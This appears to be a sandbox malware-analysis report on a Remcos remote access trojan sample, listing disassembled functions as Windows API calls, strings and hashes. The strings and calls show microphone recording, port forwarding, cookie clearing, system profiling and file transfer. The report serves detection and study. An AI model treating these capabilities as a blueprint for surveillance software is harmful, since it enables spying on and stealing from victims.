                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                        • String ID:
                                        • API String ID: 2441525078-0
                                        • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                        • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                        • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                        • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                        • TranslateMessage.USER32(?), ref: 00404F30
                                        • DispatchMessageA.USER32(?), ref: 00404F3B
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 2956720200-749203953
                                        • Opcode ID: ed276ae60632ddb1123add7be1ccbfba2608c39a5df5d2a815a288664d31e13e
                                        • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                        • Opcode Fuzzy Hash: ed276ae60632ddb1123add7be1ccbfba2608c39a5df5d2a815a288664d31e13e
                                        • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 83979f30ba13052199b290374f4e897ff0c223aa30bace9cb26b013bf86a6d8f
                                        • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                        • Opcode Fuzzy Hash: 83979f30ba13052199b290374f4e897ff0c223aa30bace9cb26b013bf86a6d8f
                                        • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                        APIs
                                        • _free.LIBCMT ref: 00446DEF
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 00446DFB
                                        • _free.LIBCMT ref: 00446E06
                                        • _free.LIBCMT ref: 00446E11
                                        • _free.LIBCMT ref: 00446E1C
                                        • _free.LIBCMT ref: 00446E27
                                        • _free.LIBCMT ref: 00446E32
                                        • _free.LIBCMT ref: 00446E3D
                                        • _free.LIBCMT ref: 00446E48
                                        • _free.LIBCMT ref: 00446E56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                        • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                        • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                        • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                        Strings
                                        • DisplayName, xrefs: 0041B8E1
                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B84C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                        • API String ID: 1332880857-3614651759
                                        • Opcode ID: 076c50df7618aadf373f3c01ed9bd4609fd971215d56056228721ff8a86bdb77
                                        • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                        • Opcode Fuzzy Hash: 076c50df7618aadf373f3c01ed9bd4609fd971215d56056228721ff8a86bdb77
                                        • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Eventinet_ntoa
                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                        • API String ID: 3578746661-4192532303
                                        • Opcode ID: 8131232ea4e110a78cbbe142682e0b221beec53302878eaae0296b789d50c990
                                        • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                        • Opcode Fuzzy Hash: 8131232ea4e110a78cbbe142682e0b221beec53302878eaae0296b789d50c990
                                        • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • Sleep.KERNEL32(00000064), ref: 00416688
                                        • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CreateDeleteExecuteShellSleep
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1462127192-2001430897
                                        • Opcode ID: b9a5cb25ade68b6fe2589745dbe0be08f51fb2d4aea0f2061956a18dd9341e5a
                                        • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                        • Opcode Fuzzy Hash: b9a5cb25ade68b6fe2589745dbe0be08f51fb2d4aea0f2061956a18dd9341e5a
                                        • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                        APIs
                                        • _strftime.LIBCMT ref: 00401AD3
                                          • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                        • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                        • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                        • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                        • API String ID: 3809562944-3643129801
                                        • Opcode ID: f816f63c6ac9835ee23b06cccc8d3180f7f4d1f3f2885b8dfbf4a592b63f2106
                                        • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                        • Opcode Fuzzy Hash: f816f63c6ac9835ee23b06cccc8d3180f7f4d1f3f2885b8dfbf4a592b63f2106
                                        • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                        APIs
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                        • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                        • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                        • waveInStart.WINMM ref: 00401A81
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                        • String ID: XCG$`=G$x=G
                                        • API String ID: 1356121797-903574159
                                        • Opcode ID: 2fa2782d5286cb6b946f29ce45bec9f2347d723f1f3b5a78e95a6039d4b8a833
                                        • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                        • Opcode Fuzzy Hash: 2fa2782d5286cb6b946f29ce45bec9f2347d723f1f3b5a78e95a6039d4b8a833
                                        • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                          • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                          • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                          • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                        • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                        • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                        • TranslateMessage.USER32(?), ref: 0041CA0B
                                        • DispatchMessageA.USER32(?), ref: 0041CA15
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID: Remcos
                                        • API String ID: 1970332568-165870891
                                        • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                        • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                        • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                        • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                        • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                        • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                        • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                        • __alloca_probe_16.LIBCMT ref: 00452CA1
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                        • __alloca_probe_16.LIBCMT ref: 00452D4B
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                        • __freea.LIBCMT ref: 00452DBA
                                        • __freea.LIBCMT ref: 00452DC6
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 201697637-0
                                        • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                        • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                        • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                        • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • _memcmp.LIBVCRUNTIME ref: 004446B3
                                        • _free.LIBCMT ref: 00444724
                                        • _free.LIBCMT ref: 0044473D
                                        • _free.LIBCMT ref: 0044476F
                                        • _free.LIBCMT ref: 00444778
                                        • _free.LIBCMT ref: 00444784
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorLast$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 1679612858-1037565863
                                        • Opcode ID: 78a772055084dd11d4ef40813aeefa18dab1270aefb2628fdec0a9e84f74d69a
                                        • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                        • Opcode Fuzzy Hash: 78a772055084dd11d4ef40813aeefa18dab1270aefb2628fdec0a9e84f74d69a
                                        • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: tcp$udp
                                        • API String ID: 0-3725065008
                                        • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                        • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                        • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                        • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumInfoOpenQuerysend
                                        • String ID: TUF$TUFTUF$>G$DG$DG
                                        • API String ID: 3114080316-72097156
                                        • Opcode ID: 08034cecb19fcd7980957ebfa6e18f25f8bbd9987c681b47e78dc83fc42bb37e
                                        • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                        • Opcode Fuzzy Hash: 08034cecb19fcd7980957ebfa6e18f25f8bbd9987c681b47e78dc83fc42bb37e
                                        • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                        • String ID: .part
                                        • API String ID: 1303771098-3499674018
                                        • Opcode ID: 124c633532e8600691c4108089ff1e2e84c33ce980c006a8ee94900b53e6ed61
                                        • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                        • Opcode Fuzzy Hash: 124c633532e8600691c4108089ff1e2e84c33ce980c006a8ee94900b53e6ed61
                                        • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                        APIs
                                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                          • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                        • _wcslen.LIBCMT ref: 0041A906
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                        • API String ID: 3286818993-703403762
                                        • Opcode ID: f6ea33bfe9aeb7d2f24a1418d8181db5ac7c03ccdcffe2a82dcde258621e9c28
                                        • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                        • Opcode Fuzzy Hash: f6ea33bfe9aeb7d2f24a1418d8181db5ac7c03ccdcffe2a82dcde258621e9c28
                                        • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                        APIs
                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TUF
                                        • API String ID: 1133728706-1738023494
                                        • Opcode ID: bb986ea289b59e8881aae87098969c6da156300248b9d043587579c05a1b425d
                                        • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                        • Opcode Fuzzy Hash: bb986ea289b59e8881aae87098969c6da156300248b9d043587579c05a1b425d
                                        • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                        APIs
                                        • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                        • GetConsoleWindow.KERNEL32 ref: 0041BECF
                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Console$Window$AllocOutputShow
                                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                        • API String ID: 4067487056-2527699604
                                        • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                        • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                        • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                        • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                                        • __alloca_probe_16.LIBCMT ref: 004499F2
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
                                        • __alloca_probe_16.LIBCMT ref: 00449AD7
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                        • __freea.LIBCMT ref: 00449B47
